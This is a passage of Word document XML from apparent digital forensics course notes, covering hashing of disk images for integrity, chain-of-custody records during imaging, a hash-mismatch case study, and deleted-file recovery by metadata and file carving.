        </w:rPr>
        <w:t xml:space="preserve">Hash the image again whenever it is moved, copied or opened later — a matching hash proves it has not changed since acquisition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Why record both MD5 and SHA-1 (and SHA-256)?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A single algorithm may later be shown to be weak. If two </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">independent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> algorithms both match, the chance that a changed file passes both is practically zero. Recording more than one hash also lets the evidence be checked with tools that support only one of them, and protects against a court challenge based on weakness of a single algorithm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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Hash commands</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">md5sum evidence.dd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sha1sum evidence.dd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sha256sum evidence.dd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># Windows PowerShell:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Get-FileHash evidence.dd -Algorithm SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:left w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:bottom w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:right w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F3ECF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A3D9A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">↔ Commonly confused</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Hash vs encryption:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> encryption is reversible with a key and protects secrecy; hashing is one-way and proves integrity. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Hash vs image:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> the hash is only a fingerprint; the image is the actual copy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.7 Chain of Custody During Imaging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Imaging is a major event for the evidence, so extra details are added to the chain-of-custody form at this stage:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Make, model, serial number and capacity of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">source drive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and photographs of it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write blocker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> make, model and firmware version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Imaging </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tool and version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and settings (format, compression, segment size).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start and end time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, with time zone, and the system clock offset if it was wrong.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Examiner’s name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and signature, and names of any witnesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MD5, SHA-1, and/or SHA-256) of the source and the image, and the result of verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Location and identification of each copy of the image (master copy and working copy).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Where the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is stored afterwards, and who has access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Case study — A hash mismatch</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Situation:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> An examiner images a 500 GB laptop drive. After imaging, the source hash and image hash do not match.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Investigation:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> The log shows read errors in a few bad sectors. Because the drive was failing, each read returned slightly different data, so the source hash itself changed between reads.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Action:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> The examiner documents the bad sectors, re-images with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">noerror,sync</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> and records the hash of the image as the reference, noting why the source could not be verified.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Lesson:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> A mismatch is not always tampering, but it must always be investigated and explained in writing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.8 Deleted File Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What really happens when a file is deleted?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When you delete a file, the operating system does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> erase its contents. It only changes the file system’s records: the entry is marked as deleted and the clusters it used are marked as “available”. The actual bytes remain on the disk until new data is written over them. In NTFS, the file’s MFT record is marked </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">inactive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> while the data clusters stay unchanged until reused. (Detail in Unit III.)</w:t>
      </w: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Key idea</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Deleted ≠ destroyed.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> A deleted file is recoverable until its clusters are overwritten. Therefore the sooner the evidence is imaged — and the less the system is used afterwards — the better the chance of recovery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">There are two main approaches to recovery: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4386"/>
        <w:gridCol w:w="2923"/>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438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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Result</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Metadata-based recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="438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Reads the leftover file-system entry (e.g. the inactive MFT record) to find the file name, size, timestamps and where its data was stored.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Recovers the file with its original name, path and dates (if the data is not overwritten)</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File carving</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="438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Ignores the file system; scans raw data for known file signatures and rebuilds files from them.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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Recovers files even when file-system records are gone, but with no name, path or dates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">File carving fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File carving</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> searches unallocated space, slack space or a whole image for the characteristic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and sometimes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">footer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) bytes of known file types, and then extracts the data between them as a file. It is used when the file system is damaged, formatted, or when the directory entry has been wiped.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
